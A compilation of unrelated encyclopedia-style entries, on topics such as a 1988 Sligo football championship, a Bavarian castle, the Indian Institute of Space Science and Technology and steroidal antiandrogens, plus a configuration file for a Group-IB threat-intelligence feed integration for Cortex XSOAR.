This is a round-up of the 1988 Sligo Senior Football Championship. St. Patrick's, Dromard regained the Owen B. Hunt Cup after a fourteen-year wait, and it was a hard-earned title, having defeated the two leading lights of the 1980s - holders St. Mary's and Tubbercurry. St. Mary's were seen off emphatically after a quarter-final replay, bringing the curtain down on a remarkable era for the Sligo town club, and the Dromard side defeated Tubbercurry by a single point in the final.
First round
Quarter finals
Semi-finals
Sligo Senior Football Championship Final
References
Sligo Champion (July–September 1988)
Sligo Senior Football Championship
Sligo Senior Football Championship |
Schloss Wernsdorf is a medieval castle located in the village of Wernsdorf, in Upper Franconia, Bavaria. The castle also has a small park. The oldest parts of the castle can be dated back to the 12th century.
The castle is the home of the Privaten Akademie für Alte Musik, Kunst- und Kulturgeschichte Europas e. V. (the Private Academy for Early Music, Art and Cultural History of Europe), through which the medieval music group Capella Antiqua Bambergensis, under the direction of Wolfgang Spindler, was founded.
History
Schloss Wernsdorf supposedly stands on the remains of a fortified castle that was built in 790 AD by Charlemagne. This castle was one of the Eckpunkte des Abendlandes (the “cornerstones of the West”), and was on a trade route that led into the Slavic countries. The structure that stands there today was first documented in 1114. The Bishop of Bamberg at that time was the lord of the castle.
In 1620, the Bishop Johann Gottfried I. von Aschhausen further developed the castle. It was then used as a hunting lodge, and had next to it a sheep stall, hops garden and a brewery.
In 1803, the castle chapel and the fortified wall encircling the inner courtyard were demolished. In the following years, the property deteriorated quickly from the inside, due mainly to frequently changing owners, until the royal forester Andreas Eisfelder restored the castle in 1896. After 1945, the castle served as refugee accommodations.
In 1993, the Capella Antiqua Bambergensis bought the property, which had again fallen into poor condition. The timber framing was almost completely destroyed by dry rot and wood worms. The floors were molded, and in several places the ceilings had collapsed. There was no electricity, no sanitation and no heating. After over 30,000 hours of work, the music group re-opened the castle and the park to the public.
Modern Use of the Castle
The castle today accommodates the Private Akademie für Alte Musik, Kunst- und Kulturgeschichte Europas e. V. It serves as the venue for the Capella Antiqua Bambergensis and other medieval music groups. In addition, the following activities are offered:
Lessons on the historical musical instruments of our ancestors for children, adolescents, adults, seniors and entire families
Performance practice courses for ensembles
Lectures on music history and humanities
Lectures on art and cultural history
Courses on historical musical instruments
Courses for the integration of new media in the music research
Miscellaneous
The Private Akademie was commissioned in 2002 by Bavarian Culture Minister Hans Zehetmair to build a digital documentation center for early music in Bavaria.
In addition to various other awards, Wolfgang Spindler received the Federal Cross of Merit of 2002.
For the specific work in terms of music and social-aspects, the Bavarian government awarded Capella Antiqua Bambergensis a prize, named the Kulturpreis Bayern der E.ON Bayern AG, in 2006.
See also
List of castles in Bavaria
External links
Kulturatlas Oberfranken - Schloss Wernsdorf (History of the Castle)
Google Maps Place - Schloss Wernsdorf
Official Website of the Capella Antiqua Bambergensis
Wernsdorf
Buildings and structures in Bamberg (district) |
```yaml
category: Data Enrichment & Threat Intelligence
commonfields:
id: Group-IB Threat Intelligence & Attribution Feed
version: -1
configuration:
- additionalinfo: The FQDN/IP the integration should connect to.
defaultvalue: path_to_url
display: GIB TI URL
name: url
required: true
type: 0
- additionalinfo: The API Key and Username required to authenticate to the service.
display: Username
name: credentials
required: true
type: 9
- additionalinfo: Whether to allow connections without verifying SSL certificates validity.
display: Trust any certificate (not secure)
name: insecure
type: 8
required: false
- additionalinfo: Whether to use XSOAR system proxy settings to connect to the API.
display: Use system proxy settings
name: proxy
type: 8
required: false
- additionalinfo: Incremental feeds pull only new or modified indicators that have been sent from the integration. The determination if the indicator is new or modified happens on the 3rd-party vendor's side, so only indicators that are new or modified are sent to Cortex XSOAR. Therefore, all indicators coming from these feeds are labeled new or modified.
defaultvalue: 'true'
display: Incremental feed
hidden: true
name: feedIncremental
type: 8
required: false
- defaultvalue: 'true'
display: Fetch indicators
name: feed
type: 8
required: false
- additionalinfo: Indicators from this integration instance will be marked with this reputation
defaultvalue: Suspicious
display: Indicator Reputation
name: feedReputation
options:
- None
- Good
- Suspicious
- Bad
type: 18
required: false
- additionalinfo: Reliability of the source providing the intelligence data
defaultvalue: A - Completely reliable
display: Source Reliability
name: feedReliability
options:
- A - Completely reliable
- B - Usually reliable
- C - Fairly reliable
- D - Not usually reliable
- E - Unreliable
- F - Reliability cannot be judged
required: true
type: 15
- defaultvalue: '1'
display: Feed Fetch Interval
name: feedFetchInterval
type: 19
required: false
- additionalinfo: When selected, the exclusion list is ignored for indicators from this feed. This means that if an indicator from this feed is on the exclusion list, the indicator might still be added to the system.
display: Bypass exclusion list
name: feedBypassExclusionList
type: 8
required: false
- additionalinfo: Collections List to include for fetching.
display: Indicator collections
name: indicator_collections
options:
- compromised/mule
- compromised/imei
- attacks/ddos
- attacks/deface
- attacks/phishing
- attacks/phishing_kit
- hi/threat
- apt/threat
- osi/vulnerability
- suspicious_ip/tor_node
- suspicious_ip/open_proxy
- suspicious_ip/socks_proxy
- malware/cnc
- ioc/common
type: 16
required: false
hidden: false
- additionalinfo: Date to start fetching indicators from.
defaultvalue: 3 days
display: Indicator first fetch
name: indicators_first_fetch
type: 0
required: false
hidden: false
- additionalinfo: A number of requests per collection that integration sends in one fetch iteration (each request picks up to 200 objects with different amount of indicators). If you face some runtime errors, lower the value.
defaultvalue: '2'
display: Number of requests per collection
name: requests_count
options:
- '1'
- '2'
- '3'
- '4'
- '5'
type: 15
required: false
hidden: false
- additionalinfo: Supports CSV values.
display: Tags
name: feedTags
type: 0
required: false
- additionalinfo: The Traffic Light Protocol (TLP) designation to apply to indicators fetched from the feed
display: Traffic Light Protocol Color
name: tlp_color
options:
- RED
- AMBER
- GREEN
- WHITE
type: 15
required: false
- display: ''
name: feedExpirationPolicy
type: 17
options:
- never
- interval
- indicatorType
- suddenDeath
- display: ''
name: feedExpirationInterval
type: 1
required: false
description: Use Group-IB Threat Intelligence Feed integration to fetch IOCs from various Group-IB collections.
display: Group-IB Threat Intelligence Feed
name: Group-IB Threat Intelligence & Attribution Feed
script:
commands:
- arguments:
- auto: PREDEFINED
description: GIB Collection to get indicators from.
name: collection
predefined:
- compromised/mule
- compromised/imei
- attacks/ddos
- attacks/deface
- attacks/phishing
- attacks/phishing_kit
- hi/threat
- apt/threat
- osi/vulnerability
- suspicious_ip/tor_node
- suspicious_ip/open_proxy
- suspicious_ip/socks_proxy
- malware/cnc
- ioc/common
required: true
default: false
isArray: false
secret: false
- description: Incident Id to get indicators(if set, all the indicators will be provided from particular incident).
name: id
default: false
isArray: false
required: false
secret: false
- auto: PREDEFINED
default: true
defaultValue: '50'
description: Limit of indicators to display in War Room.
name: limit
predefined:
- '10'
- '20'
- '30'
- '40'
- '50'
isArray: false
required: false
secret: false
description: Get limited count of indicators for specified collection and get all indicators from particular events by id.
name: gibtia-get-indicators
deprecated: false
execution: false
dockerimage: demisto/python3:3.10.13.80593
feed: true
runonce: false
script: '-'
subtype: python3
type: python
isfetch: false
longRunning: false
longRunningPort: false
tests:
- No tests (auto formatted)
fromversion: 6.0.0
``` |
Trichaptum is a genus of poroid fungi. The genus was circumscribed by American mycologist William Alphonso Murrill in 1904. Formerly classified in the family Polyporaceae, several molecular studies have shown that the genus belongs to the order Hymenochaetales.
Species
Trichaptum abietinum
Trichaptum agglutinatum
Trichaptum album
Trichaptum basifuscum
Trichaptum biforme
Trichaptum brastagii
Trichaptum bulbocystidiatum
Trichaptum byssogenum
Trichaptum ceraceicutis
Trichaptum deviatum
Trichaptum favoloides
Trichaptum flavum
Trichaptum fumosoavellaneum
Trichaptum fuscoviolaceum
Trichaptum griseofuscum
Trichaptum imbricatum
Trichaptum jackiae
Trichaptum lacunosum
Trichaptum laricinum
Trichaptum molestum
Trichaptum montanum
Trichaptum parvulum
Trichaptum perenne
Trichaptum perpusillum
Trichaptum perrottetii
Trichaptum podocarpi
Trichaptum polycystidiatum
Trichaptum sector
Trichaptum strigosum
Trichaptum subchartaceum
Trichaptum suberosum
Trichaptum trichomallum
Trichaptum variabilis
Trichaptum vinaceobrunneum
References
Hymenochaetales
Taxa named by William Alphonso Murrill
Agaricomycetes genera |
Mounir Benzegala (born 7 April 1987) is an Algerian professional basketball player. He also played for the Algeria national basketball team.
Honours
Club
GS Pétroliers
Super Division: 2014, 2015, 2016.
Algerian Basketball Cup: 2013, 2014, 2015, 2016.
References
External links
Profile basketball.afrobasket
1987 births
Living people
Algerian men's basketball players
Point guards
21st-century Algerian people |
Australoplana alba, also known as the Australian flatworm, is a species of land planarian belonging to the tribe Caenoplanini. It is native to Australia.
Taxonomy
Australoplana alba contains the following subspecies:
Australoplana alba roseolineata
Australoplana alba alba
References
Geoplanidae
Animals described in 1891
Platyhelminthes of Australia
Taxa named by Arthur Dendy |
The Dr. James Bell House, also known as the Bell-Williams House, is a historic home located at 1822 E. 89th Street in Cleveland, Ohio, in the United States. Designed by noted local architect George J. Hardway for Dr. James Bell (a local dentist), it was completed in 1901. The home is a prime example of the Cleveland-area reaction at the end of the 19th century against high Victorian architecture, utilizing elements of Richardsonian Romanesque architecture to create a highly individualized, severe style.
The home was added to the National Register of Historic Places on October 16, 1986. The home is part of the East 89th Street Historic District, which was added to the National Register of Historic Places on May 26, 1988.
About the house
James Richard Bell was a prominent dentist in Cleveland in the late 19th and early 20th centuries. In 1900, he commissioned noted local architect George J. Hardway to design a large residence on E. 89th Street in the southeast quadrant of the Hough neighborhood, one of the city's oldest settled areas and which at that time was inhabited largely by white, middle-class and upper-middle-class residents. The block on which Bell chose to build was built up with a number of large residences over the past 30 years, ranging in style from Italianate to extremely elaborate Queen Anne style. The increasingly elaborate embellishments of Victorian architecture had fallen out of favor with homeowners and architects in northeast Ohio by the late 1890s, and Bell and Hardway agreed on a home that was simple to the point of being severe.
The Bell House is largely Richardsonian Romanesque in style. However, it deviates from this style by featuring a contemporary massing and relying on plain exterior walls. The three-story structure is constructed of stone and brick. The front of the house is roughly square, with an east-facing gable, a single dormer on the south side, and steep roof pitch. The third-floor windows are topped by round stone arches, with stone slabs constituting the lintel and sill of the first and second story windows. A rusticated stone porch with canopy provided the entrance to the house. The narrow-depth center section of the house features projecting polygonal bay windows on all three floors on the south side. This projection is topped by a hip-end roof. The north side of the center section is essentially a triple-wide dormer or gable facing north, with a gable roof. The rear of the building, which is about as large as the front section, returns to the square plan, although it features two dormers on the north side and none on the south. The home originally had 12 rooms, four baths, and a third-floor ballroom. By the 1970s, the ballroom had been divided and the house now had a total of 21 rooms.
Bell occupied the home until his death in 1912. The home was bequeathed to his wife, Anna Roeder Bell. She died in 1940, and bequeathed the home to her daughter, Frieda Meriam. Mrs. Meriam died in 1942, and the home was sold to John A. Smith in 1943. By 1947, the home belonged to the Sabo family, and by 1948 the Jaskell family. By 1956, it was owned by Enoch Spence, who sold it by 1961 to Harold C. Scheunemann, who in turn sold it to Raymond Beedlow by 1966.
The Hough neighborhood became an overwhelmingly poor African American area by 1960. In May 1968, the mansion was purchased by the Berry Foundation. It became the home of the Martin Luther King Residential Youth House, a residential home for troubled black youth. The ballroom was probably turned into bedrooms about this time. In the early or mid 1970s, the youth house closed, and the Lee Heights Community Church rented the structure for use by The Straight-up Half-Way House, a transitional residence for alcoholics, criminals, and drug addicts.
The Berry Foundation sold the house in 1979 to a private owner, Margaret J. Williams.
Because it exemplifies the local architectural reaction to the excesses of Victorian architecture, the house was added to the National Register of Historic Places on October 16, 1986. It was also named a Cleveland Landmark by the Cleveland Landmarks Commission, under the name Bell-Williams House.
References
External links
Hough, Cleveland
National Register of Historic Places in Cleveland, Ohio
Buildings and structures in Cleveland
Houses on the National Register of Historic Places in Ohio
Houses in Cleveland
Houses completed in 1901
Richardsonian Romanesque architecture in Ohio
Victorian architecture in Ohio |
Equisetum ramosissimum , known as branched horsetail, is a species of evergreen horsetail (genus Equisetum, subgenus Hippochaete).
Botanists today recognize two subspecies. The type subspecies, E. ramosissimum subsp. ramosissimum, is native through much of Asia, Europe, and Africa, with an introduced population in the southeast United States. E. ramosissimum subsp.debile, sometimes treated as the separate species E. debile, is found in extreme southern China, southeast Asia and some Pacific islands, including the East Indies, New Caledonia and Fiji among others. The type subspecies has more obvious branching from the aerial stem than subspecies debile. E. r. subsp. debile is one of the largest forms of Equisetum reaching a height of .
References
ramosissimum
Flora of Malta |
Aphelandra stephanophysa is a plant species in the family Acanthaceae, which is native to Atlantic Forest vegetation of Brazil. This plant is cited in Flora Brasiliensis by Carl Friedrich Philipp von Martius.
External links
Flora Brasiliensis: Aphelandra stephanophysa
stephanophysa
Endemic flora of Brazil
Flora of the Atlantic Forest |
Jakob Michael Hagopian (; October 20, 1913 – December 10, 2010) was an Armenian-born American Emmy-nominated filmmaker.
Biography
Hagopian was born to an Armenian family on 20 October 1913, in Kharpert, Mamuret-ul-Aziz Vilayet, Ottoman Empire. In summer of 1915, when the Ottoman soldiers rampaged through Kharpert, Michael's mother hid her child in a mulberry bush and prayed that the soldiers would not find him. Both escaped, and moved to Fresno, California.
Hagopian received an undergraduate degree from the University of California, Berkeley, and after receiving a doctorate in international relations from Harvard University, he went into cinema and founded the Atlantis Films Company, which produced over fifty documentary films on ethnic minorities and foreign lands. He won critical acclaim, including two Emmy nominations for his film The Forgotten Genocide, the first full-length feature on the Armenian genocide. The film encompassed twenty years of research and nearly 400 witness interviews.
In 1979, Hagopian founded the non-profit Armenian Film Foundation dedicated to preserving the visual and personal histories of the witnesses to the Armenian Genocide.
In 2004 Hagopian's "Germany and the Secret Genocide" documentary became the winner of US International Film & Video Festival.
The pre-release version of Hagopian's 58-minute documentary "The River Ran Red" opened the Eighth Annual Arpa International Film Festival on Oct. 24, 2008 at the Egyptian Theatre in Hollywood, California, four days after Hagopian’s 95th birthday.
Other awards
Arpa Lifetime Achievement Award.
Armin T. Wegner Humanitarian Award, 2006.
Jewish World Watch's 'I Witness' Award.
Filmography
The Witnesses Trilogy
Part 3:
Part 2:
Part 1:
(Produced for the Curriculum Development and Supplemental Materials Commission of the State of California.)
California Armenians: The First Generation
The Art of Traditional Armenian Cooking
Soviet Boy
African Girl-Malobi (1960)
Africa is My Home (1960)
References
External links
Armenian Film Foundation (Official Website of the organization founded by Hagopian)
Hagopian the Filmmaker on the website of the Armenian Film Foundation
Hagopian at Armeniapedia
95-year-old Award-Winning Filmmaker Completes 70th Documentary, PRWeb, October 15, 2008
Award-Winning Filmmaker J. Michael Hagopian Dies at 97, Asbarez
Obituary of Michael Hagopian, The Daily Telegraph, 20 December, 2010
1913 births
2010 deaths
People from Elazığ
People from Mamuret-ul-Aziz vilayet
Armenians from the Ottoman Empire
Emigrants from the Ottoman Empire to the United States
American film directors
Armenian refugees
University of California, Berkeley alumni
Harvard University alumni
American people of Armenian descent
Armenian genocide survivors |
Humberto Luna is a Spanish-language radio personality, TV host, and movie actor. He currently has a Spanish-language radio show broadcast throughout the United States called El Show de Humberto Luna.
Biography
Describir a HUMBERTO LUNA es hablar de constancia, entrega, pasión, optimismo, sencillez y buen humor, mismo que siempre lo ha caracterizado a lo largo de su brillante carrera no solo como locutor de Radio, sino también como actor y conductor de televisión.
Este talentoso Zacatecano, desde muy pequeño mostró grandes inquietudes por la Radio. Se graduó de La Escuela Nacional de Locutores de México, obteniendo su Certificado de Aptitud que otorga La Secretaria de Educación Pública a través de La Dirección General de Educación Audiovisual como Locutor, Cronista y Comentarista de Noticias de acuerdo a los artículos 84, 85 y 86 de la Ley Federal de Radio y Televisión.
Y en el año 1970 llega a Los Ángeles California cargado de ilusiones seguido por su pasión por la Radio que lo ha llevado sin lugar alguna a convertirse en una de las Personalidades más populares en el Sur de California por imponer su propia marca creativa y permanecer al aire en el gusto de la audiencia por más de 4 décadas en diversas estaciones de radio en la Unión Americana.
La estrella del entretenimiento radial, también ha participado en el mágico mundo del cine, 27 películas lo comprueban, en Televisión co-presento “HABLEMOS DE CINE” uno de los programas más exitosos de la Cadena Univisión, en Telemundo fue el conductor de su propio Show “LA HORA LUNATICA” a nivel Internacional y en Los Ángeles por Azteca América Canal 54 también co-presento “A TODO COLOR”.
Y el 12 de octubre de 1990, su nombre quedo grabado para la posteridad en el PASEO DE LA FAMA DE HOLLYWOOD convirtiéndolo en el primer LOCUTOR HISPANO en obtener una de las privilegiadas estrellas que la ciudad otorga a personalidades extrajeras.
Son muchos los reconocimientos que por casi medio siglo de entrega le han sido otorgados, en 1991 la revista HISPANIC BUSINESS MAGAZINE lo nombro “Uno de los 100 Hispanos de Mayor influencia en Estados Unidos” y actualmente continua al aire en importante cadena Radial.
Bien esta ha sido una breve sinopsis de un locutor migrante, icono de la radio en español, que ha destacado en Estados Unidos…. Humberto Luna,
References
Sources
External links
Star on the Hollywood Walk of Fame
1948 births
American radio personalities
Living people
Mexican emigrants to the United States
People from Zacatecas |
Indian Institute of Space Science and Technology (IIST) is a government-aided institute and deemed university for the study and research of space science, located in Thiruvananthapuram,India. IIST was set up in 2007 by the Indian Space Research Organisation (ISRO) under the Department of Space, Government of India.
It was inaugurated on 14 September 2007 by G. Madhavan Nair, the then Chairman of ISRO. A. P. J. Abdul Kalam, former President of India, was the first Chancellor of IIST. IIST offers regular engineering undergraduate, postgraduate and doctorate programmes with focus on space science, technology and applications.
History
Envisioned to fulfill the requirements of scientists and engineers in the Indian Space Program, by offering undergraduate and postgraduate education and research programmes in space science and technology, the institute started functioning from the Vikram Sarabhai Space Centre (VSSC) campus, Thiruvananthapuram, on 14 September 2007 with an initial investment of and annual recurring cost of by the Department of Space. It is the only institute of its kind in India, which offers a BTech degree in Space Technology, and subjects exclusive to the arena of space science and technology. B. N. Suresh, former director of Vikram Sarabhai Space Centre, is the founding director of the institute.
On 14 July 2008, the Union Human Resource Development Ministry, on the advice of the University Grants Commission (UGC), conferred deemed university status, under a new category, to the institute for a period of five years.
Campus
At its inception, the institute started functioning at the ATF Campus, under Vikram Sarabhai Space Centre, Thiruvananthapuram (Trivandrum), Kerala. Modern environmentally friendly buildings of unique architecture merge well with the thickly wooded campus of 100 acres situated on the foothills of Sahyadri.
A state-of-the-art residential campus built near Liquid Propulsion Systems Centre in Valiamala, Nedumangad, Thiruvananthapuram was inaugurated by Manmohan Singh, the then Prime Minister of India on 25 August 2009. The institute started functioning in its new campus from 15 August 2010. The campus has an extension in the picturesque Ponmudi Hills, Thiruvananthapuram, for an observatory.
Academics
IIST offers undergraduate (BTech), master's (MTech) and PhD programs in space science and technology, and also serves as a research centre. Doctoral programs in basic sciences and post-doctoral programs are also offered. Till 2013 batch, three different courses in BTech were offered, namely BTech in Aerospace, Avionics and Physical Sciences. As of 2014 admissions, a new 5-year Dual Degree (BTech + MTech/M.S) in Engineering Physics replaced the existing Physical Sciences branch. The MTech/M.S can be done in any of the following – M.S. in Astronomy & Astrophysics, MTech in Earth System Science, MTech in Machine Learning and Computing, MTech in Geoinformatics, MTech in Aerodynamics & Flight Mechanics, MTech in Structures and Design, MTech in Thermal and Propulsion, MTech in Control Systems, MTech in Digital Signal Processing, MTech in RF and Microwave Engineering, MTech in Power Electronics, MTech in VLSI and Microsystems, MTech in Material Science and Technology, MTech in Solid State Physics and MTech in Optical Engineering. The seats are limited to 20 in the dual degree program from the existing 36 in Physical Sciences. 60 students each are admitted to the Aerospace and Avionics branches.
Admissions
The admissions to the undergraduate (BTech) programmes for 2013 to 2016 were made through the All India Rank List prepared and published by the Central Board of Secondary Education (CBSE), based on the Joint Entrance Examination (JEE) – Main. Previously, IIST admitted students through the IIT-JEE rank lists from 2007 to 2009, and conducted its own entrance exam called ISAT from 2010 to 2012. However, applicants will need to qualify the JEE Advanced exam, and marks obtained in the same will be used in determining the eligibility of the candidate IIST offers 140 seats for admission to its B.Tech. programmes in aerospace engineering, avionics and engineering physics. The BTech branch of physical sciences was replaced with a dual-degree (BTech and MTech) engineering physics branch starting from the batch which joined in 2014. Over 100,000 aspirants applied for these seats in ISAT 2012 making IIST one of the most selective institutes in India. From 2017 onwards, the admissions are based on JEE Advanced scores.
The applications for admission to MTech courses are invited directly and students are shortlisted based on undergraduate academic performance, GATE score, interview and projects undertaken by them.
Departments
Science
Department of Mathematics
Department of Physics
Department of Chemistry
Department of Earth and Space sciences
Technology
Department of Aerospace Engineering
Department of Avionics
Humanities
Department of Humanities
Rankings
Indian Institute of Space Science and Technology was ranked 48 by the National Institutional Ranking Framework (NIRF) engineering category 2023.
Observatory
IIST also has a small observatory on campus equipped with a 14-inch Schmidt-Cassegrain telescope and an 8-inch Newtonian telescope. The telescope is housed in a dome on top of the Science academic block (also called as the D2 block). The facility is mainly used by undergraduate and postgraduate students as well as for frequent vacation-based outreach programs. The dome is powered by two sets of solar panels with necessary back-up power.
Student activities
Student projects
VYOM ('sky' in Sanskrit) is the Sounding Rocket designed by the BTech students of IIST. Vyom had its maiden flight on 11 May 2012 when it took to the sky from TERLS. and the mission was a total success. The objective of the launch was to flight-test the solid rocket motor and the accelerometer payload developed for the project. Vyom is the first student made sounding rocket in Asia and the Vyom Mk II was planned for launch in 2015.
IIST also runs a student satellite project, which is also slated for launch in 2014–2015 on board the PSLV.
Student festivals
The following student festivals are organised at IIST every year.
Conscientia
Conscientia is the Annual Astronomy and Technology Festival of IIST. Conscientia offers various challenging events in different fields of engineering and science, including astronomy, aerospace engineering, electronics, computer science, mechanical engineering, robotics, etc. In the year 2010, the astronomy festival Aparimit has been incorporated into Conscientia.
The 2010 edition was inaugurated by IIST's Chancellor, A. P. J. Abdul Kalam, former President of India.
In just a few years, Conscientia has evolved to become the largest technical festival in the state of Kerala. The 2014 edition of the festival is going to start on 28 February 2014. The official website of the festival
Dhanak
Dhanak is the Annual Cultural Festival of IIST. Named after the Urdu word for 'rainbow', it stands for the splash of colour and sunshine that this festival brings with it. It spans all facets of cultural activity, including dramatics, fine arts, literature, quizzing, music, dance, film-making, and photography. The most awaited moment at Dhanak is the pronite, in which a DJ/Band is invited to perform. Dhanak 2015 witnessed DJ VH1 Supersonic. Progressive Brothers from DJ Sunburn gave their performance in 2016 and Masala Coffee, South India's largest band performed in Dhanak in 2017. Dhanak also features themes every year based on which the whole campus is decorated. The theme for 2018 was "comicolours".
IIST Model United Nations (IIST MUN)
Started as an intra-college event in March 2012, IIST MUN has now become a national inter-college Model United Nations with United Nations General Assembly council held successfully in September 2012, 2013, October 2014 and April 2015. It has become an annual event, with the 2019 event to be held in April.
International collaborations
IIST has signed a number of memorandums of understanding (MoUs) with international universities and Institutions for joint research, and exchange of students and faculty. These include Caltech-USA, Jet Propulsion Laboratory-USA, University of Colorado, Boulder-USA, Technion-Israel, University of Cambridge-UK and Nanyang Technological University-Singapore. A number of other collaborations are under discussions. The Satish Dhawan fellowship at California Institute of Technology was announced by K. Radhakrishnan, Chairman, ISRO on 3 June 2013. The fellowship provides an opportunity every year starting from the winter session of the academic year 2013–14 to one meritorious graduating student from the Aerospace Department of IIST to be sponsored by the Department of Space, Government of India to pursue master's degree in aerospace engineering at the California Institute of Technology.
See also
List of engineering colleges in Kerala
List of universities in India
List of autonomous higher education institutes in India
Department of Space (India)
Indian Space Research Organisation
Indian Institutes of Technology
Indian Institute of Science
Indian Institute of Astrophysics
National Institutes of Technology
References
External links
Space technology research institutes
Aerospace engineering organizations
Space programme of India
Indian Space Research Organisation facilities
Deemed universities in India
Science and technology in Kerala
Universities in Kerala
Colleges in Thiruvananthapuram
Research institutes in Thiruvananthapuram
Educational institutions established in 2007
2007 establishments in Kerala
Research institutes established in 2007 |
A steroidal antiandrogen (SAA) is an antiandrogen with a steroidal chemical structure. They are typically antagonists of the androgen receptor (AR) and act both by blocking the effects of androgens like testosterone and dihydrotestosterone (DHT) and by suppressing gonadal androgen production. SAAs lower concentrations of testosterone through simulation of the negative feedback inhibition of the hypothalamus. SAAs are used in the treatment of androgen-dependent conditions in men and women, and are also used in veterinary medicine for the same purpose. They are the converse of nonsteroidal antiandrogens (NSAAs), which are antiandrogens that are not steroids and are structurally unrelated to testosterone.
Medical uses
SAAs are used in clinical medicine for the following indications:
Prostate cancer in men
Benign prostatic hyperplasia in men
Androgen-dependent skin and hair conditions like acne, hirsutism, seborrhea, and pattern hair loss (androgenic alopecia) in women
Hyperandrogenism, such as due to polycystic ovary syndrome or congenital adrenal hyperplasia, in women
As a component of hormone therapy for transgender women
Precocious puberty in boys
Hypersexuality and paraphilias in men and sex offenders
Priapism in men
Available forms
Pharmacology
Unlike NSAAs, most SAAs show off-target hormonal activity such as progestogenic, glucocorticoid, or antimineralocorticoid activity, possess antigonadotropic effects, and are weak partial agonists of the AR with some capacity to activate the receptor. Due to their antigonadotropic effects, SAAs lower androgen levels in addition to directly blocking the actions of androgens at the AR; at sufficiently high dosages, they are able to lower circulating testosterone levels by up to 70 to 80% in men, to just above the castrate range. However, due to their other hormonal effects, suppression of estrogen levels alongside testosterone levels, and AR activation, SAAs have increased side effects and show lower efficacy in the treatment of prostate cancer relative to NSAAs.
List of SAAs
Marketed
Used specifically as antiandrogens (major)
Cyproterone acetate (Androcur): A combined AR antagonist and progestogen/antigonadotropin. Also has weak glucocorticoid activity. Previously used widely in the treatment of prostate cancer, but since largely replaced by NSAAs. Also used for androgen-dependent indications in women and transgender women, precocious puberty in boys, and as a means of chemical castration for sexual deviation in men. Widely used in oral contraceptives as well (with ethinylestradiol under the brand names Diane and Diane-35). Not available in the United States. Uniquely among most SAAs, has a high risk of liver changes and hepatotoxicity. Also has a high incidence of psychiatric side effects such as depression, anxiety, and fatigue.
Spironolactone (Aldactone): An antimineralocorticoid (aldosterone antagonist) with additional/coincidental antiandrogen activity. Specifically acts as an AR antagonist, weak antigonadotropin, and weak steroidogenesis inhibitor. Used for androgen-dependent indications in women and transgender women, particularly in the United States where cyproterone acetate is unavailable. Studied in the treatment of benign prostatic hyperplasia but was found to be ineffective. Contraindicated in prostate cancer due to weak androgenic activity and stimulation of tumor growth. Most commonly used as a diuretic and antihypertensive for cardiovascular disease. Commonly associated with gynecomastia (breast development) and menstrual disturbances.
Used specifically as antiandrogens (minor)
Chlormadinone acetate (Prostal): A combined AR antagonist and progestogen/antigonadotropin. Also has weak glucocorticoid activity. Widely used in the treatment of prostate cancer in Japan, but little used for this purpose elsewhere. Has largely been replaced by NSAAs. Mostly used throughout the world in oral contraceptives (with ethinylestradiol under the brand names Belara and Belarina). Not available in the United States.
Gestonorone caproate (Depostat, Primostat): A pure progestogen/antigonadotropin without any direct AR antagonism or other hormonal activity. Injected intramuscularly. Used in the treatment of benign prostatic hyperplasia in certain countries such as the United Kingdom. Not available in the United States.
Hydroxyprogesterone caproate (Proluton, Proluton Depot): A pure progestogen/antigonadotropin without any direct AR antagonism or other hormonal activity. Injected intramuscularly. Studied in the treatment of benign prostatic hyperplasia and showed some albeit only marginal effectiveness. Associated with hypogonadism and causes impotence in two-thirds of men. Mostly used for gynecological and obstetric indications in women.
Medrogestone (Colprone): A progestogen/antigonadotropin with additional activity as an AR antagonist and steroidogenesis inhibitor. Also has weak glucocorticoid activity. Formerly used in the treatment of benign prostatic hyperplasia in men. Most commonly used in the treatment of gynecological disorders and in menopause. It is an older progestin that has mostly been discontinued and is now rarely used.
Medroxyprogesterone acetate (Depo-Provera): A progestogen/antigonadotropin without any direct AR antagonism. Also has weak androgenic and glucocorticoid activity and acts as a steroidogenesis inhibitor at very high dosages. Injected intramuscularly. Used as a means of chemical castration for sexual deviation in men, particularly in the United States where cyproterone acetate is unavailable. Studied in the treatment of prostate cancer but never widely used. Has also been used to prevent precocious puberty. Most commonly used as a long-lasting injectable contraceptive in women.
Megestrol acetate (Megace): A combined AR partial antagonist and progestogen/antigonadotropin. Also has weak androgenic and glucocorticoid activity. Studied in the treatment of prostate cancer but showed poor effectiveness. Mostly used as an appetite stimulant in patients with cachexia.
Oxendolone (Prostetin, Roxenone): A combined AR antagonist and progestogen/antigonadotropin. Marketed in Japan only for the treatment of benign prostatic hyperplasia. Controversial due to low effectiveness observed in clinical studies.
Used as antiandrogens in veterinary medicine
Delmadinone acetate (Tardak): A combined AR antagonist and progestogen/antigonadotropin. Also has weak glucocorticoid activity. Used in veterinary medicine only. Marketed in Europe and Oceania for the treatment of androgen-dependent conditions such as benign prostatic hyperplasia in dogs.
Osaterone acetate (Ypozane): A combined AR antagonist and progestogen/antigonadotropin. Used in veterinary medicine only. Marketed in Europe specifically for the treatment of benign prostatic hyperplasia in dogs. Has been associated with transiently elevated liver enzymes.
Used exclusively as progestins in women
Dienogest (Visanne, Dinagest): Progestin with some AR antagonist activity. Used as an oral contraceptive (with estradiol valerate as Natazia and Qlaira and with ethinylestradiol as Valette) and in the treatment of endometriosis.
Drospirenone: Progestin with antimineralocorticoid and AR antagonist activity. Used in combination with estrogen in hormonal replacement therapy and oral contraceptives (with ethinylestradiol as Yasmin, Yasminelle, and Yaz and with estradiol as Angeliq). Also used (as an oral contraceptive) in the treatment of acne.
Nomegestrol acetate (Lutenyl): Progestin with AR antagonist activity. Used in the treatment of gynecological disorders and in hormonal replacement therapy and oral contraceptives (with estradiol as Naemis and Zoely).
Miscellaneous
Mifepristone (RU-486; Mifegyne, Mifeprex): An antiprogestogen which is widely used as an abortifacient. Also has antiglucocorticoid and AR antagonist activity. Has been found to produce gynecomastia as a side effect in men at a relatively high rate in clinical studies. Has been studied as a treatment for prostate cancer.
Steroidal androgen synthesis inhibitors like the CYP17A1 inhibitor abiraterone acetate (Zytiga) or the 5α-reductase inhibitors finasteride and dutasteride could also technically be described as "SAAs", but the term is usually reserved to describe AR antagonists (and sometimes progestogenic antigonadotropins).
Not marketed
Under development
Clascoterone (CB-03-01; Breezula, Winlevi): A pure AR antagonist. Topical without any systemic activity. Under development for the treatment of acne and pattern hair loss (androgenic alopecia).
Development discontinued
11α-Hydroxyprogesterone (11α-OHP): Possibly the first antiandrogen to be discovered. Weak antiandrogen used topically. Studied in the 1950s for the treatment of androgen-dependent skin conditions like acne and reportedly showed some effectiveness but was never marketed.
